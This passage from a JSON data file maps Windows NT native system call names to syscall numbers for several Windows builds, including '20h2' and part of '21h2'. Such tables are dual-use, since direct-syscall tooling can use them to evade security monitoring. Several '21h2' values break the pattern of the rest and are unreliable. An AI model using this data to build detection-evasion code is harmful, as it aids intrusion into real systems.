182, "NtCreatePort": 183, "NtCreatePrivateNamespace": 184, "NtCreateProcess": 185, "NtCreateProfile": 186, "NtCreateProfileEx": 187, "NtCreateRegistryTransaction": 188, "NtCreateResourceManager": 189, "NtCreateSectionEx": 190, "NtCreateSemaphore": 191, "NtCreateSymbolicLinkObject": 192, "NtCreateThreadEx": 193, "NtCreateTimer": 194, "NtCreateTimer2": 195, "NtCreateToken": 196, "NtCreateTokenEx": 197, "NtCreateTransaction": 198, "NtCreateTransactionManager": 199, "NtCreateUserProcess": 200, "NtCreateWaitCompletionPacket": 201, "NtCreateWaitablePort": 202, "NtCreateWnfStateName": 203, "NtCreateWorkerFactory": 204, "NtDebugActiveProcess": 205, "NtDebugContinue": 206, "NtDeleteAtom": 207, "NtDeleteBootEntry": 208, "NtDeleteDriverEntry": 209, "NtDeleteFile": 210, "NtDeleteKey": 211, "NtDeleteObjectAuditAlarm": 212, "NtDeletePrivateNamespace": 213, "NtDeleteValueKey": 214, "NtDeleteWnfStateData": 215, "NtDeleteWnfStateName": 216, "NtDirectGraphicsCall": 217, "NtDisableLastKnownGood": 218, "NtDisplayString": 219, "NtDrawText": 220, "NtEnableLastKnownGood": 221, "NtEnumerateBootEntries": 222, "NtEnumerateDriverEntries": 223, "NtEnumerateSystemEnvironmentValuesEx": 224, "NtEnumerateTransactionObject": 225, "NtExtendSection": 226, "NtFilterBootOption": 227, "NtFilterToken": 228, "NtFilterTokenEx": 229, "NtFlushBuffersFileEx": 230, "NtFlushInstallUILanguage": 231, "NtFlushInstructionCache": 232, "NtFlushKey": 233, "NtFlushProcessWriteBuffers": 234, "NtFlushVirtualMemory": 235, "NtFlushWriteBuffer": 236, "NtFreeUserPhysicalPages": 237, "NtFreezeRegistry": 238, "NtFreezeTransactions": 239, "NtGetCachedSigningLevel": 240, "NtGetCompleteWnfStateSubscription": 241, "NtGetContextThread": 242, "NtGetCurrentProcessorNumber": 243, "NtGetCurrentProcessorNumberEx": 244, "NtGetDevicePowerState": 245, "NtGetMUIRegistryInfo": 246, "NtGetNextProcess": 247, "NtGetNextThread": 248, "NtGetNlsSectionPtr": 249, "NtGetNotificationResourceManager": 250, "NtGetWriteWatch": 251, "NtImpersonateAnonymousToken": 252, "NtImpersonateThread": 253, "NtInitializeEnclave": 254, "NtInitializeNlsFiles": 255, "NtInitializeRegistry": 256, "NtInitiatePowerAction": 257, "NtIsSystemResumeAutomatic": 258, "NtIsUILanguageComitted": 259, "NtListenPort": 260, "NtLoadDriver": 261, "NtLoadEnclaveData": 262, "NtLoadKey": 263, "NtLoadKey2": 264, "NtLoadKeyEx": 265, "NtLockFile": 266, "NtLockProductActivationKeys": 267, "NtLockRegistryKey": 268, "NtLockVirtualMemory": 269, "NtMakePermanentObject": 270, "NtMakeTemporaryObject": 271, "NtManageHotPatch": 272, "NtManagePartition": 273, "NtMapCMFModule": 274, "NtMapUserPhysicalPages": 275, "NtMapViewOfSectionEx": 276, "NtModifyBootEntry": 277, "NtModifyDriverEntry": 278, "NtNotifyChangeDirectoryFile": 279, "NtNotifyChangeDirectoryFileEx": 280, "NtNotifyChangeKey": 281, "NtNotifyChangeMultipleKeys": 282, "NtNotifyChangeSession": 283, "NtOpenEnlistment": 284, "NtOpenEventPair": 285, "NtOpenIoCompletion": 286, "NtOpenJobObject": 287, "NtOpenKeyEx": 288, "NtOpenKeyTransacted": 289, "NtOpenKeyTransactedEx": 290, "NtOpenKeyedEvent": 291, "NtOpenMutant": 292, "NtOpenObjectAuditAlarm": 293, "NtOpenPartition": 294, "NtOpenPrivateNamespace": 295, "NtOpenProcessToken": 296, "NtOpenRegistryTransaction": 297, "NtOpenResourceManager": 298, "NtOpenSemaphore": 299, "NtOpenSession": 300, "NtOpenSymbolicLinkObject": 301, "NtOpenThread": 302, "NtOpenTimer": 303, "NtOpenTransaction": 304, "NtOpenTransactionManager": 305, "NtPlugPlayControl": 306, "NtPrePrepareComplete": 307, "NtPrePrepareEnlistment": 308, "NtPrepareComplete": 309, "NtPrepareEnlistment": 310, "NtPrivilegeCheck": 311, "NtPrivilegeObjectAuditAlarm": 312, "NtPrivilegedServiceAuditAlarm": 313, "NtPropagationComplete": 314, "NtPropagationFailed": 315, "NtPssCaptureVaSpaceBulk": 316, "NtPulseEvent": 317, "NtQueryAuxiliaryCounterFrequency": 318, "NtQueryBootEntryOrder": 319, "NtQueryBootOptions": 320, "NtQueryDebugFilterState": 321, "NtQueryDirectoryFileEx": 322, "NtQueryDirectoryObject": 323, "NtQueryDriverEntryOrder": 324, "NtQueryEaFile": 325, "NtQueryFullAttributesFile": 326, "NtQueryInformationAtom": 327, "NtQueryInformationByName": 328, "NtQueryInformationEnlistment": 329, "NtQueryInformationJobObject": 330, "NtQueryInformationPort": 331, "NtQueryInformationResourceManager": 332, "NtQueryInformationTransaction": 333, "NtQueryInformationTransactionManager": 334, "NtQueryInformationWorkerFactory": 335, "NtQueryInstallUILanguage": 336, "NtQueryIntervalProfile": 337, "NtQueryIoCompletion": 338, "NtQueryLicenseValue": 339, "NtQueryMultipleValueKey": 340, "NtQueryMutant": 341, "NtQueryOpenSubKeys": 342, "NtQueryOpenSubKeysEx": 343, "NtQueryPortInformationProcess": 344, "NtQueryQuotaInformationFile": 345, "NtQuerySecurityAttributesToken": 346, "NtQuerySecurityObject": 347, "NtQuerySecurityPolicy": 348, "NtQuerySemaphore": 349, "NtQuerySymbolicLinkObject": 350, "NtQuerySystemEnvironmentValue": 351, "NtQuerySystemEnvironmentValueEx": 352, "NtQuerySystemInformationEx": 353, "NtQueryTimerResolution": 354, "NtQueryWnfStateData": 355, "NtQueryWnfStateNameInformation": 356, "NtQueueApcThreadEx": 357, "NtRaiseException": 358, "NtRaiseHardError": 359, "NtReadOnlyEnlistment": 360, "NtRecoverEnlistment": 361, "NtRecoverResourceManager": 362, "NtRecoverTransactionManager": 363, "NtRegisterProtocolAddressInformation": 364, "NtRegisterThreadTerminatePort": 365, "NtReleaseKeyedEvent": 366, "NtReleaseWorkerFactoryWorker": 367, "NtRemoveIoCompletionEx": 368, "NtRemoveProcessDebug": 369, "NtRenameKey": 370, "NtRenameTransactionManager": 371, "NtReplaceKey": 372, "NtReplacePartitionUnit": 373, "NtReplyWaitReplyPort": 374, "NtRequestPort": 375, "NtResetEvent": 376, "NtResetWriteWatch": 377, "NtRestoreKey": 378, "NtResumeProcess": 379, "NtRevertContainerImpersonation": 380, "NtRollbackComplete": 381, "NtRollbackEnlistment": 382, "NtRollbackRegistryTransaction": 383, "NtRollbackTransaction": 384, "NtRollforwardTransactionManager": 385, "NtSaveKey": 386, "NtSaveKeyEx": 387, "NtSaveMergedKeys": 388, "NtSecureConnectPort": 389, "NtSerializeBoot": 390, "NtSetBootEntryOrder": 391, "NtSetBootOptions": 392, "NtSetCachedSigningLevel": 393, "NtSetCachedSigningLevel2": 394, "NtSetContextThread": 395, "NtSetDebugFilterState": 396, "NtSetDefaultHardErrorPort": 397, "NtSetDefaultLocale": 398, "NtSetDefaultUILanguage": 399, "NtSetDriverEntryOrder": 400, "NtSetEaFile": 401, "NtSetHighEventPair": 402, "NtSetHighWaitLowEventPair": 403, "NtSetIRTimer": 404, "NtSetInformationDebugObject": 405, "NtSetInformationEnlistment": 406, "NtSetInformationJobObject": 407, "NtSetInformationKey": 408, "NtSetInformationResourceManager": 409, "NtSetInformationSymbolicLink": 410, "NtSetInformationToken": 411, "NtSetInformationTransaction": 412, "NtSetInformationTransactionManager": 413, "NtSetInformationVirtualMemory": 414, "NtSetInformationWorkerFactory": 415, "NtSetIntervalProfile": 416, "NtSetIoCompletion": 417, "NtSetIoCompletionEx": 418, "NtSetLdtEntries": 419, "NtSetLowEventPair": 420, "NtSetLowWaitHighEventPair": 421, "NtSetQuotaInformationFile": 422, "NtSetSecurityObject": 423, "NtSetSystemEnvironmentValue": 424, "NtSetSystemEnvironmentValueEx": 425, "NtSetSystemInformation": 426, "NtSetSystemPowerState": 427, "NtSetSystemTime": 428, "NtSetThreadExecutionState": 429, "NtSetTimer2": 430, "NtSetTimerEx": 431, "NtSetTimerResolution": 432, "NtSetUuidSeed": 433, "NtSetVolumeInformationFile": 434, "NtSetWnfProcessNotificationEvent": 435, "NtShutdownSystem": 436, "NtShutdownWorkerFactory": 437, "NtSignalAndWaitForSingleObject": 438, "NtSinglePhaseReject": 439, "NtStartProfile": 440, "NtStopProfile": 441, "NtSubscribeWnfStateChange": 442, "NtSuspendProcess": 443, "NtSuspendThread": 444, "NtSystemDebugControl": 445, "NtTerminateEnclave": 446, "NtTerminateJobObject": 447, "NtTestAlert": 448, "NtThawRegistry": 449, "NtThawTransactions": 450, "NtTraceControl": 451, "NtTranslateFilePath": 452, "NtUmsThreadYield": 453, "NtUnloadDriver": 454, "NtUnloadKey": 455, "NtUnloadKey2": 456, "NtUnloadKeyEx": 457, "NtUnlockFile": 458, "NtUnlockVirtualMemory": 459, "NtUnmapViewOfSectionEx": 460, "NtUnsubscribeWnfStateChange": 461, "NtUpdateWnfStateData": 462, "NtVdmControl": 463, "NtWaitForAlertByThreadId": 464, "NtWaitForDebugEvent": 465, "NtWaitForKeyedEvent": 466, "NtWaitForWorkViaWorkerFactory": 467, "NtWaitHighEventPair": 468, "NtWaitLowEventPair": 469, "NtLoadKey3": 470}, "20h2": {"NtAccessCheck": 0, "NtWorkerFactoryWorkerReady": 1, "NtAcceptConnectPort": 2, "NtMapUserPhysicalPagesScatter": 3, "NtWaitForSingleObject": 4, "NtCallbackReturn": 5, "NtReadFile": 6, "NtDeviceIoControlFile": 7, "NtWriteFile": 8, "NtRemoveIoCompletion": 9, "NtReleaseSemaphore": 10, "NtReplyWaitReceivePort": 11, "NtReplyPort": 12, "NtSetInformationThread": 13, "NtSetEvent": 14, "NtClose": 15, "NtQueryObject": 16, "NtQueryInformationFile": 17, "NtOpenKey": 18, "NtEnumerateValueKey": 19, "NtFindAtom": 20, "NtQueryDefaultLocale": 21, "NtQueryKey": 22, "NtQueryValueKey": 23, "NtAllocateVirtualMemory": 24, "NtQueryInformationProcess": 25, "NtWaitForMultipleObjects32": 26, "NtWriteFileGather": 27, "NtSetInformationProcess": 28, "NtCreateKey": 29, "NtFreeVirtualMemory": 30, "NtImpersonateClientOfPort": 31, "NtReleaseMutant": 32, "NtQueryInformationToken": 33, "NtRequestWaitReplyPort": 34, "NtQueryVirtualMemory": 35, "NtOpenThreadToken": 36, "NtQueryInformationThread": 37, "NtOpenProcess": 38, "NtSetInformationFile": 39, "NtMapViewOfSection": 40, "NtAccessCheckAndAuditAlarm": 41, "NtUnmapViewOfSection": 42, "NtReplyWaitReceivePortEx": 43, "NtTerminateProcess": 44, "NtSetEventBoostPriority": 45, "NtReadFileScatter": 46, "NtOpenThreadTokenEx": 47, "NtOpenProcessTokenEx": 48, "NtQueryPerformanceCounter": 49, "NtEnumerateKey": 50, "NtOpenFile": 51, "NtDelayExecution": 52, "NtQueryDirectoryFile": 53, "NtQuerySystemInformation": 54, "NtOpenSection": 55, "NtQueryTimer": 56, "NtFsControlFile": 57, "NtWriteVirtualMemory": 58, "NtCloseObjectAuditAlarm": 59, "NtDuplicateObject": 60, "NtQueryAttributesFile": 61, "NtClearEvent": 62, "NtReadVirtualMemory": 63, "NtOpenEvent": 64, "NtAdjustPrivilegesToken": 65, "NtDuplicateToken": 66, "NtContinue": 67, "NtQueryDefaultUILanguage": 68, "NtQueueApcThread": 69, "NtYieldExecution": 70, "NtAddAtom": 71, "NtCreateEvent": 72, "NtQueryVolumeInformationFile": 73, "NtCreateSection": 74, "NtFlushBuffersFile": 75, "NtApphelpCacheControl": 76, "NtCreateProcessEx": 77, "NtCreateThread": 78, "NtIsProcessInJob": 79, "NtProtectVirtualMemory": 80, "NtQuerySection": 81, "NtResumeThread": 82, "NtTerminateThread": 83, "NtReadRequestData": 84, "NtCreateFile": 85, "NtQueryEvent": 86, "NtWriteRequestData": 87, "NtOpenDirectoryObject": 88, "NtAccessCheckByTypeAndAuditAlarm": 89, "NtQuerySystemTime": 90, "NtWaitForMultipleObjects": 91, "NtSetInformationObject": 92, "NtCancelIoFile": 93, "NtTraceEvent": 94, "NtPowerInformation": 95, "NtSetValueKey": 96, "NtCancelTimer": 97, "NtSetTimer": 98, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAcquireCrossVmMutant": 103, "NtAcquireProcessActivityReference": 104, "NtAddAtomEx": 105, "NtAddBootEntry": 106, "NtAddDriverEntry": 107, "NtAdjustGroupsToken": 108, "NtAdjustTokenClaimsAndDeviceGroups": 109, "NtAlertResumeThread": 110, "NtAlertThread": 111, "NtAlertThreadByThreadId": 112, "NtAllocateLocallyUniqueId": 113, "NtAllocateReserveObject": 114, "NtAllocateUserPhysicalPages": 115, "NtAllocateUserPhysicalPagesEx": 116, "NtAllocateUuids": 117, "NtAllocateVirtualMemoryEx": 118, "NtAlpcAcceptConnectPort": 119, "NtAlpcCancelMessage": 120, "NtAlpcConnectPort": 121, "NtAlpcConnectPortEx": 122, "NtAlpcCreatePort": 123, "NtAlpcCreatePortSection": 124, "NtAlpcCreateResourceReserve": 125, "NtAlpcCreateSectionView": 126, "NtAlpcCreateSecurityContext": 127, "NtAlpcDeletePortSection": 128, "NtAlpcDeleteResourceReserve": 129, "NtAlpcDeleteSectionView": 130, "NtAlpcDeleteSecurityContext": 131, "NtAlpcDisconnectPort": 132, "NtAlpcImpersonateClientContainerOfPort": 133, "NtAlpcImpersonateClientOfPort": 134, "NtAlpcOpenSenderProcess": 135, "NtAlpcOpenSenderThread": 136, "NtAlpcQueryInformation": 137, "NtAlpcQueryInformationMessage": 138, "NtAlpcRevokeSecurityContext": 139, "NtAlpcSendWaitReceivePort": 140, "NtAlpcSetInformation": 141, "NtAreMappedFilesTheSame": 142, "NtAssignProcessToJobObject": 143, "NtAssociateWaitCompletionPacket": 144, "NtCallEnclave": 145, "NtCancelIoFileEx": 146, "NtCancelSynchronousIoFile": 147, "NtCancelTimer2": 148, "NtCancelWaitCompletionPacket": 149, "NtCommitComplete": 150, "NtCommitEnlistment": 151, "NtCommitRegistryTransaction": 152, "NtCommitTransaction": 153, "NtCompactKeys": 154, "NtCompareObjects": 155, "NtCompareSigningLevels": 156, "NtCompareTokens": 157, "NtCompleteConnectPort": 158, "NtCompressKey": 159, "NtConnectPort": 160, "NtContinueEx": 161, "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": 162, "NtCreateCrossVmEvent": 163, "NtCreateCrossVmMutant": 164, "NtCreateDebugObject": 165, "NtCreateDirectoryObject": 166, "NtCreateDirectoryObjectEx": 167, "NtCreateEnclave": 168, "NtCreateEnlistment": 169, "NtCreateEventPair": 170, "NtCreateIRTimer": 171, "NtCreateIoCompletion": 172, "NtCreateJobObject": 173, "NtCreateJobSet": 174, "NtCreateKeyTransacted": 175, "NtCreateKeyedEvent": 176, "NtCreateLowBoxToken": 177, "NtCreateMailslotFile": 178, "NtCreateMutant": 179, "NtCreateNamedPipeFile": 180, "NtCreatePagingFile": 181, "NtCreatePartition": 182, "NtCreatePort": 183, "NtCreatePrivateNamespace": 184, "NtCreateProcess": 185, "NtCreateProfile": 186, "NtCreateProfileEx": 187, "NtCreateRegistryTransaction": 188, "NtCreateResourceManager": 189, "NtCreateSectionEx": 190, "NtCreateSemaphore": 191, "NtCreateSymbolicLinkObject": 192, "NtCreateThreadEx": 193, "NtCreateTimer": 194, "NtCreateTimer2": 195, "NtCreateToken": 196, "NtCreateTokenEx": 197, "NtCreateTransaction": 198, "NtCreateTransactionManager": 199, "NtCreateUserProcess": 200, "NtCreateWaitCompletionPacket": 201, "NtCreateWaitablePort": 202, "NtCreateWnfStateName": 203, "NtCreateWorkerFactory": 204, "NtDebugActiveProcess": 205, "NtDebugContinue": 206, "NtDeleteAtom": 207, "NtDeleteBootEntry": 208, "NtDeleteDriverEntry": 209, "NtDeleteFile": 210, "NtDeleteKey": 211, "NtDeleteObjectAuditAlarm": 212, "NtDeletePrivateNamespace": 213, "NtDeleteValueKey": 214, "NtDeleteWnfStateData": 215, "NtDeleteWnfStateName": 216, "NtDirectGraphicsCall": 217, "NtDisableLastKnownGood": 218, "NtDisplayString": 219, "NtDrawText": 220, "NtEnableLastKnownGood": 221, "NtEnumerateBootEntries": 222, "NtEnumerateDriverEntries": 223, "NtEnumerateSystemEnvironmentValuesEx": 224, "NtEnumerateTransactionObject": 225, "NtExtendSection": 226, "NtFilterBootOption": 227, "NtFilterToken": 228, "NtFilterTokenEx": 229, "NtFlushBuffersFileEx": 230, "NtFlushInstallUILanguage": 231, "NtFlushInstructionCache": 232, "NtFlushKey": 233, "NtFlushProcessWriteBuffers": 234, "NtFlushVirtualMemory": 235, "NtFlushWriteBuffer": 236, "NtFreeUserPhysicalPages": 237, "NtFreezeRegistry": 238, "NtFreezeTransactions": 239, "NtGetCachedSigningLevel": 240, "NtGetCompleteWnfStateSubscription": 241, "NtGetContextThread": 242, "NtGetCurrentProcessorNumber": 243, "NtGetCurrentProcessorNumberEx": 244, "NtGetDevicePowerState": 245, "NtGetMUIRegistryInfo": 246, "NtGetNextProcess": 247, "NtGetNextThread": 248, "NtGetNlsSectionPtr": 249, "NtGetNotificationResourceManager": 250, "NtGetWriteWatch": 251, "NtImpersonateAnonymousToken": 252, "NtImpersonateThread": 253, "NtInitializeEnclave": 254, "NtInitializeNlsFiles": 255, "NtInitializeRegistry": 256, "NtInitiatePowerAction": 257, "NtIsSystemResumeAutomatic": 258, "NtIsUILanguageComitted": 259, "NtListenPort": 260, "NtLoadDriver": 261, "NtLoadEnclaveData": 262, "NtLoadKey": 263, "NtLoadKey2": 264, "NtLoadKeyEx": 265, "NtLockFile": 266, "NtLockProductActivationKeys": 267, "NtLockRegistryKey": 268, "NtLockVirtualMemory": 269, "NtMakePermanentObject": 270, "NtMakeTemporaryObject": 271, "NtManageHotPatch": 272, "NtManagePartition": 273, "NtMapCMFModule": 274, "NtMapUserPhysicalPages": 275, "NtMapViewOfSectionEx": 276, "NtModifyBootEntry": 277, "NtModifyDriverEntry": 278, "NtNotifyChangeDirectoryFile": 279, "NtNotifyChangeDirectoryFileEx": 280, "NtNotifyChangeKey": 281, "NtNotifyChangeMultipleKeys": 282, "NtNotifyChangeSession": 283, "NtOpenEnlistment": 284, "NtOpenEventPair": 285, "NtOpenIoCompletion": 286, "NtOpenJobObject": 287, "NtOpenKeyEx": 288, "NtOpenKeyTransacted": 289, "NtOpenKeyTransactedEx": 290, "NtOpenKeyedEvent": 291, "NtOpenMutant": 292, "NtOpenObjectAuditAlarm": 293, "NtOpenPartition": 294, "NtOpenPrivateNamespace": 295, "NtOpenProcessToken": 296, "NtOpenRegistryTransaction": 297, "NtOpenResourceManager": 298, "NtOpenSemaphore": 299, "NtOpenSession": 300, "NtOpenSymbolicLinkObject": 301, "NtOpenThread": 302, "NtOpenTimer": 303, "NtOpenTransaction": 304, "NtOpenTransactionManager": 305, "NtPlugPlayControl": 306, "NtPrePrepareComplete": 307, "NtPrePrepareEnlistment": 308, "NtPrepareComplete": 309, "NtPrepareEnlistment": 310, "NtPrivilegeCheck": 311, "NtPrivilegeObjectAuditAlarm": 312, "NtPrivilegedServiceAuditAlarm": 313, "NtPropagationComplete": 314, "NtPropagationFailed": 315, "NtPssCaptureVaSpaceBulk": 316, "NtPulseEvent": 317, "NtQueryAuxiliaryCounterFrequency": 318, "NtQueryBootEntryOrder": 319, "NtQueryBootOptions": 320, "NtQueryDebugFilterState": 321, "NtQueryDirectoryFileEx": 322, "NtQueryDirectoryObject": 323, "NtQueryDriverEntryOrder": 324, "NtQueryEaFile": 325, "NtQueryFullAttributesFile": 326, "NtQueryInformationAtom": 327, "NtQueryInformationByName": 328, "NtQueryInformationEnlistment": 329, "NtQueryInformationJobObject": 330, "NtQueryInformationPort": 331, "NtQueryInformationResourceManager": 332, "NtQueryInformationTransaction": 333, "NtQueryInformationTransactionManager": 334, "NtQueryInformationWorkerFactory": 335, "NtQueryInstallUILanguage": 336, "NtQueryIntervalProfile": 337, "NtQueryIoCompletion": 338, "NtQueryLicenseValue": 339, "NtQueryMultipleValueKey": 340, "NtQueryMutant": 341, "NtQueryOpenSubKeys": 342, "NtQueryOpenSubKeysEx": 343, "NtQueryPortInformationProcess": 344, "NtQueryQuotaInformationFile": 345, "NtQuerySecurityAttributesToken": 346, "NtQuerySecurityObject": 347, "NtQuerySecurityPolicy": 348, "NtQuerySemaphore": 349, "NtQuerySymbolicLinkObject": 350, "NtQuerySystemEnvironmentValue": 351, "NtQuerySystemEnvironmentValueEx": 352, "NtQuerySystemInformationEx": 353, "NtQueryTimerResolution": 354, "NtQueryWnfStateData": 355, "NtQueryWnfStateNameInformation": 356, "NtQueueApcThreadEx": 357, "NtRaiseException": 358, "NtRaiseHardError": 359, "NtReadOnlyEnlistment": 360, "NtRecoverEnlistment": 361, "NtRecoverResourceManager": 362, "NtRecoverTransactionManager": 363, "NtRegisterProtocolAddressInformation": 364, "NtRegisterThreadTerminatePort": 365, "NtReleaseKeyedEvent": 366, "NtReleaseWorkerFactoryWorker": 367, "NtRemoveIoCompletionEx": 368, "NtRemoveProcessDebug": 369, "NtRenameKey": 370, "NtRenameTransactionManager": 371, "NtReplaceKey": 372, "NtReplacePartitionUnit": 373, "NtReplyWaitReplyPort": 374, "NtRequestPort": 375, "NtResetEvent": 376, "NtResetWriteWatch": 377, "NtRestoreKey": 378, "NtResumeProcess": 379, "NtRevertContainerImpersonation": 380, "NtRollbackComplete": 381, "NtRollbackEnlistment": 382, "NtRollbackRegistryTransaction": 383, "NtRollbackTransaction": 384, "NtRollforwardTransactionManager": 385, "NtSaveKey": 386, "NtSaveKeyEx": 387, "NtSaveMergedKeys": 388, "NtSecureConnectPort": 389, "NtSerializeBoot": 390, "NtSetBootEntryOrder": 391, "NtSetBootOptions": 392, "NtSetCachedSigningLevel": 393, "NtSetCachedSigningLevel2": 394, "NtSetContextThread": 395, "NtSetDebugFilterState": 396, "NtSetDefaultHardErrorPort": 397, "NtSetDefaultLocale": 398, "NtSetDefaultUILanguage": 399, "NtSetDriverEntryOrder": 400, "NtSetEaFile": 401, "NtSetHighEventPair": 402, "NtSetHighWaitLowEventPair": 403, "NtSetIRTimer": 404, "NtSetInformationDebugObject": 405, "NtSetInformationEnlistment": 406, "NtSetInformationJobObject": 407, "NtSetInformationKey": 408, "NtSetInformationResourceManager": 409, "NtSetInformationSymbolicLink": 410, "NtSetInformationToken": 411, "NtSetInformationTransaction": 412, "NtSetInformationTransactionManager": 413, "NtSetInformationVirtualMemory": 414, "NtSetInformationWorkerFactory": 415, "NtSetIntervalProfile": 416, "NtSetIoCompletion": 417, "NtSetIoCompletionEx": 418, "NtSetLdtEntries": 419, "NtSetLowEventPair": 420, "NtSetLowWaitHighEventPair": 421, "NtSetQuotaInformationFile": 422, "NtSetSecurityObject": 423, "NtSetSystemEnvironmentValue": 424, "NtSetSystemEnvironmentValueEx": 425, "NtSetSystemInformation": 426, "NtSetSystemPowerState": 427, "NtSetSystemTime": 428, "NtSetThreadExecutionState": 429, "NtSetTimer2": 430, "NtSetTimerEx": 431, "NtSetTimerResolution": 432, "NtSetUuidSeed": 433, "NtSetVolumeInformationFile": 434, "NtSetWnfProcessNotificationEvent": 435, "NtShutdownSystem": 436, "NtShutdownWorkerFactory": 437, "NtSignalAndWaitForSingleObject": 438, "NtSinglePhaseReject": 439, "NtStartProfile": 440, "NtStopProfile": 441, "NtSubscribeWnfStateChange": 442, "NtSuspendProcess": 443, "NtSuspendThread": 444, "NtSystemDebugControl": 445, "NtTerminateEnclave": 446, "NtTerminateJobObject": 447, "NtTestAlert": 448, "NtThawRegistry": 449, "NtThawTransactions": 450, "NtTraceControl": 451, "NtTranslateFilePath": 452, "NtUmsThreadYield": 453, "NtUnloadDriver": 454, "NtUnloadKey": 455, "NtUnloadKey2": 456, "NtUnloadKeyEx": 457, "NtUnlockFile": 458, "NtUnlockVirtualMemory": 459, "NtUnmapViewOfSectionEx": 460, "NtUnsubscribeWnfStateChange": 461, "NtUpdateWnfStateData": 462, "NtVdmControl": 463, "NtWaitForAlertByThreadId": 464, "NtWaitForDebugEvent": 465, "NtWaitForKeyedEvent": 466, "NtWaitForWorkViaWorkerFactory": 467, "NtWaitHighEventPair": 468, "NtWaitLowEventPair": 469, "NtLoadKey3": 470},"21h2":{"NtAccessCheck": 0, "NtAccessCheckAndAuditAlarm": 41, "NtAccessCheckByType": 99, "NtAccessCheckByTypeAndAuditAlarm": 89, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAcquireCrossVmMutant": 103, "NtAcquireProcessActivityReference": 104, "NtAddAtom": 655431, "NtAddAtomEx": 1114217, "NtAddBootEntry": 106, "NtAddDriverEntry": 107, "NtAdjustGroupsToken": 108, "NtAdjustPrivilegesToken": 65, "NtAdjustTokenClaimsAndDeviceGroups": 109, "NtAlertResumeThread": 458862, "NtAlertThread": 196719, "NtAlertThreadByThreadId": 262256, "NtAllocateLocallyUniqueId": 262257, "NtAllocateReserveObject": 114, "NtAllocateUserPhysicalPages": 115, "NtAllocateUserPhysicalPagesEx": 116, "NtAllocateUuids": 1114229, "NtAllocateVirtualMemory": 24, "NtAllocateVirtualMemoryEx": 118, "NtAlpcAcceptConnectPort": 119, "NtAlpcCancelMessage": 120, "NtAlpcConnectPort": 121, "NtAlpcConnectPortEx": 122, "NtAlpcCreatePort": 123, "NtAlpcCreatePortSection": 124, "NtAlpcCreateResourceReserve": 125, "NtAlpcCreateSectionView": 126, "NtAlpcCreateSecurityContext": 127, "NtAlpcDeletePortSection": 128, "NtAlpcDeleteResourceReserve": 129, "NtAlpcDeleteSectionView": 130, "NtAlpcDeleteSecurityContext": 131, "NtAlpcDisconnectPort": 132, "NtAlpcImpersonateClientContainerOfPort": 133, "NtAlpcImpersonateClientOfPort": 134, "NtAlpcOpenSenderProcess": 135, "NtAlpcOpenSenderThread": 136, "NtAlpcQueryInformation": 137, "NtAlpcQueryInformationMessage": 138, "NtAlpcRevokeSecurityContext": 139, "NtAlpcSendWaitReceivePort": 140, "NtAlpcSetInformation": 141, "NtApphelpCacheControl": 76, "NtAreMappedFilesTheSame": 327822, "NtAssignProcessToJobObject": 524431, "NtAssociateWaitCompletionPacket": 144, "NtCallEnclave": 145, "NtCallbackReturn": 5, "NtCancelIoFile": 93, "NtCancelIoFileEx": 146, "NtCancelSynchronousIoFile": 147, "NtCancelTimer": 97, "NtCancelTimer2": 148, "NtCancelWaitCompletionPacket": 149, "NtClearEvent": 196670, "NtClose": 196623, "NtCloseObjectAuditAlarm": 59, "NtCommitComplete": 150, "NtCommitEnlistment": 151, "NtCommitRegistryTransaction": 152, "NtCommitTransaction": 153, "NtCompactKeys": 154, "NtCompareObjects": 155, "NtCompareSigningLevels": 156, "NtCompareTokens": 157, "NtCompleteConnectPort": 158, "NtCompressKey": 196767, "NtConnectPort": 160, "NtContinue": 67, "NtContinueEx": 161, "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": 162, "NtCreateCrossVmEvent": 163, "NtCreateCrossVmMutant": 164, "NtCreateDebugObject": 165, "NtCreateDirectoryObject": 166, "NtCreateDirectoryObjectEx": 167, "NtCreateEnclave": 168, "NtCreateEnlistment": 169, "NtCreateEvent": 72, "NtCreateEventPair": 170, "NtCreateFile": 85, "NtCreateIRTimer": 171, "NtCreateIoCompletion": 172, "NtCreateJobObject": 173, "NtCreateJobSet": 174, "NtCreateKey": 29, "NtCreateKeyTransacted": 175, "NtCreateKeyedEvent": 176, "NtCreateLowBoxToken": 177, "NtCreateMailslotFile": 178, "NtCreateMutant": 179, "NtCreateNamedPipeFile": 180, "NtCreatePagingFile": 181, "NtCreatePartition": 182, "NtCreatePort": 183, "NtCreatePrivateNamespace": 184, "NtCreateProcess": 185, "NtCreateProcessEx": 77, "NtCreateProfile": 186, "NtCreateProfileEx": 187, "NtCreateRegistryTransaction": 188, "NtCreateResourceManager": 189, "NtCreateSection": 74, "NtCreateSectionEx": 190, "NtCreateSemaphore": 191, "NtCreateSymbolicLinkObject": 192, "NtCreateThread": 78, "NtCreateThreadEx": 193, "NtCreateTimer": 194, "NtCreateTimer2": 195, "NtCreateToken": 196, "NtCreateTokenEx": 197, "NtCreateTransaction": 198, "NtCreateTransactionManager": 199, "NtCreateUserProcess": 200, "NtCreateWaitCompletionPacket": 201, "NtCreateWaitablePort": 202, "NtCreateWnfStateName": 203, "NtCreateWorkerFactory": 204, "NtDebugActiveProcess": 524493, "NtDebugContinue": 206, "NtDelayExecution": 393268, "NtDeleteAtom": 262351, "NtDeleteBootEntry": 208, "NtDeleteDriverEntry": 209, "NtDeleteFile": 210, "NtDeleteKey": 211, "NtDeleteObjectAuditAlarm": 212, "NtDeletePrivateNamespace": 213, "NtDeleteValueKey": 214, "NtDeleteWnfStateData": 215, "NtDeleteWnfStateName": 216, "NtDeviceIoControlFile": 1769479, "NtDirectGraphicsCall": 217, "NtDisableLastKnownGood": 218, "NtDisplayString": 219, "NtDrawText": 220, "NtDuplicateObject": 60, "NtDuplicateToken": 66, "NtEnableLastKnownGood": 221, "NtEnumerateBootEntries": 222, "NtEnumerateDriverEntries": 223, "NtEnumerateKey": 50, "NtEnumerateSystemEnvironmentValuesEx": 224, "NtEnumerateTransactionObject": 225, "NtEnumerateValueKey": 19, "NtExtendSection": 226, "NtFilterBootOption": 227, "NtFilterToken": 228, "NtFilterTokenEx": 229, "NtFindAtom": 655380, "NtFlushBuffersFile": 75, 